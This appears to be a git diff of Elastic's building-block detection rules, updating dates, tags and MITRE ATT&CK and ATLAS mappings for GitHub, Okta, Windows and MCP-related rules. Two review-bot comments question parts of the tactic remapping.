b/rules_building_block/execution_github_new_repo_interaction_for_user.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of GitHub User Interaction with Private Repo" risk_score = 21 rule_id = "01c49712-25bc-49d2-a27d-d7ce52f5dc49" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,17 +30,21 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.repo"] diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml index 0b5f2635db1..a21707d6f12 100644 --- a/rules_building_block/execution_github_repo_created.toml +++ b/rules_building_block/execution_github_repo_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -17,14 +17,7 @@ name = "GitHub Repo Created" risk_score = 21 rule_id = "6cea88e4-6ce2-4238-9981-a54c140d6336" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Resource Development", "Data Source: Github"] timestamp_override = "event.ingested" type = "eql" @@ -35,14 +28,18 @@ configuration where event.dataset == "github.audit" and event.action == "repo.cr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1583" +name = "Acquire Infrastructure" +reference = "https://attack.mitre.org/techniques/T1583/" +[[rule.threat.technique.subtechnique]] +id = "T1583.006" +name = "Web Services" +reference = "https://attack.mitre.org/techniques/T1583/006/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml index 33a822c8378..4c857b6a80f 100644 --- a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml +++ b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -17,14 +17,7 @@ name = "First Occurrence of GitHub Repo Interaction From a New IP" risk_score = 21 rule_id = "0294f105-d7af-4a02-ae90-35f56763ffa2" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,17 +30,21 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["github.repo", "github.actor_ip"] diff --git a/rules_building_block/execution_linux_segfault.toml b/rules_building_block/execution_linux_segfault.toml index e1d006ca679..50dbe75c7ed 100644 --- a/rules_building_block/execution_linux_segfault.toml +++ b/rules_building_block/execution_linux_segfault.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,11 +55,3 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/execution_mcp_server_child_process.toml b/rules_building_block/execution_mcp_server_child_process.toml index 12629a21bf0..c29262c19e5 100644 --- a/rules_building_block/execution_mcp_server_child_process.toml +++ b/rules_building_block/execution_mcp_server_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,14 +121,26 @@ process where event.type == "start" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0053" +name = "AI Agent Tool Invocation" +reference = "https://atlas.mitre.org/techniques/AML.T0053/" + +[rule.threat.tactic] +id = "AML.TA0005" +name = "Execution" +reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml index 1c014464624..5ca6627651a 100644 --- a/rules_building_block/execution_settingcontent_ms_file_creation.toml +++ b/rules_building_block/execution_settingcontent_ms_file_creation.toml 
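Review bot: The MITRE ATLAS block added in the `@@ -121,14 +121,26 @@` hunk uses the tactic display name `Execution`, identical to the ATT&CK tactic mapped just above it, so anything keyed on `tactic.name` alone — the `Tactic: Execution` tag, navigator exports, duplicate-tactic checks — now sees two threat entries behind one name. Make sure the tag/tactic consistency check groups entries by `framework` and dedupes the expected tags, otherwise this rule will report a duplicate or orphan tactic tag. The ATLAS identifiers (`AML.T0053`, `AML.TA0005`) and their names should also be verified against the ATLAS release the repository validates with, since ATLAS has renamed and renumbered techniques between releases; I cannot confirm the id/name pair from the diff alone.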
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = ["https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f risk_score = 21 rule_id = "1e6363a6-3af5-41d4-b7ea-d475389c0ceb" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" 
@@ -46,36 +37,31 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/execution_unsigned_service_executable.toml b/rules_building_block/execution_unsigned_service_executable.toml index 3a861c4ab50..ffcabcb5d95 100644 --- a/rules_building_block/execution_unsigned_service_executable.toml +++ b/rules_building_block/execution_unsigned_service_executable.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -20,15 +20,7 @@ name = "Execution of an Unsigned Service" risk_score = 21 rule_id = "56fdfcf1-ca7c-4fd9-951d-e215ee26e404" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "new_terms" @@ -42,39 +34,21 @@ not process.code_signature.status : (errorCode_endpoint* or "errorChaining") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "user.id"] diff --git a/rules_building_block/impact_github_pat_access_revoked.toml b/rules_building_block/impact_github_pat_access_revoked.toml index f94c6f93197..3d5e9ef049b 100644 --- a/rules_building_block/impact_github_pat_access_revoked.toml +++ b/rules_building_block/impact_github_pat_access_revoked.toml 
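Review bot: The `@@ -42,39 +34,21 @@` hunk removes the T1036.001 (Invalid Code Signature) / Defense Evasion mapping, yet the query context in the hunk header filters on `process.code_signature.status` and the rule is named for unsigned services, which is precisely the behaviour T1036.001 describes. The tags hunk above drops `Tactic: Defense Evasion` to match, so the rule now claims only Execution/T1569.002 and loses coverage it actually provides. Unless the intent is to limit BBR rules to a single tactic, keep the removed `[[rule.threat]]` block for T1036.001 under TA0005 and restore the `Tactic: Defense Evasion` tag.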
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -33,16 +33,3 @@ configuration where event.dataset == "github.audit" and event.action == "persona ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml index 2e625988a7e..f73cc4350e5 100644 --- a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml +++ b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/12/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -87,31 +87,31 @@ network where http.request.method == "POST" and http.response.status_code != 200 [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml index b441c6147ea..51618b8cec8 100644 --- a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml +++ b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -17,14 +17,7 @@ name = "First Occurrence of IP Address For GitHub Personal Access Token (PAT)" risk_score = 21 rule_id = "fc909baa-fb34-4c46-9691-be276ef4234c" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Initial Access", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,22 +30,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.actor_ip"] diff --git a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml index 8f55ee6ca9d..1479b9622dc 100644 --- a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml 
+++ b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,27 +51,3 @@ event.dataset:o365.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml index 168d55055ce..e0e39924ce2 100644 --- a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -57,24 +57,3 @@ event.dataset:o365.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml index fc9e62e6053..25dca76688d 100644 --- a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/08/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -73,20 +73,7 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Defender", - "Data Source: Microsoft Defender for Office 365", - "Data Source: Microsoft Threat Intelligence", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Defender", "Data Source: Microsoft Defender for Office 365", "Data Source: Microsoft Threat Intelligence", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -98,26 +85,13 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml index 6126e019db1..ab6d84d3a15 100644 --- a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml 
+++ b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/04" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,39 +55,3 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/initial_access_new_okta_authentication_behavior.toml b/rules_building_block/initial_access_new_okta_authentication_behavior.toml index 3333bc42b4d..c5fc2bc4b00 100644 --- a/rules_building_block/initial_access_new_okta_authentication_behavior.toml +++ b/rules_building_block/initial_access_new_okta_authentication_behavior.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -76,8 +76,17 @@ event.dataset:okta.system and okta.debug_context.debug_data.risk_behaviors:* [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml index 38c577a2179..cc03ed2a61a 100644 --- a/rules_building_block/initial_access_okta_admin_console_login_failure.toml +++ b/rules_building_block/initial_access_okta_admin_console_login_failure.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/03" integration = ["okta"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ references = [ risk_score = 21 rule_id = "f960e8a4-31c1-4a6e-b172-8f5c8e5c8c2a" severity = "low" -tags = [ - "Domain: Identity", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Tactic: Initial Access", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Rule Type: BBR", -] +tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" 
@@ -81,26 +72,13 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/lateral_movement_at.toml b/rules_building_block/lateral_movement_at.toml index ddedfe457c3..463fc4d11a7 100644 --- a/rules_building_block/lateral_movement_at.toml +++ b/rules_building_block/lateral_movement_at.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,16 +26,7 @@ name = "At.exe Command Lateral Movement" risk_score = 21 rule_id = "b483365c-98a8-40c0-92d8-0458ca25058a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" 
@@ -46,36 +37,31 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml index 444d49ece7f..aca164ce61f 100644 --- a/rules_building_block/lateral_movement_posh_winrm_activity.toml +++ b/rules_building_block/lateral_movement_posh_winrm_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -83,36 +83,36 @@ case_insensitive = true value = "?:\\\\ExchangeServer\\\\bin*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.006" -name = "Windows Remote Management" -reference = "https://attack.mitre.org/techniques/T1021/006/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.006" +name = "Windows Remote Management" +reference = "https://attack.mitre.org/techniques/T1021/006/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml index dbc9fce692a..79380de7439 100644 --- a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml +++ b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
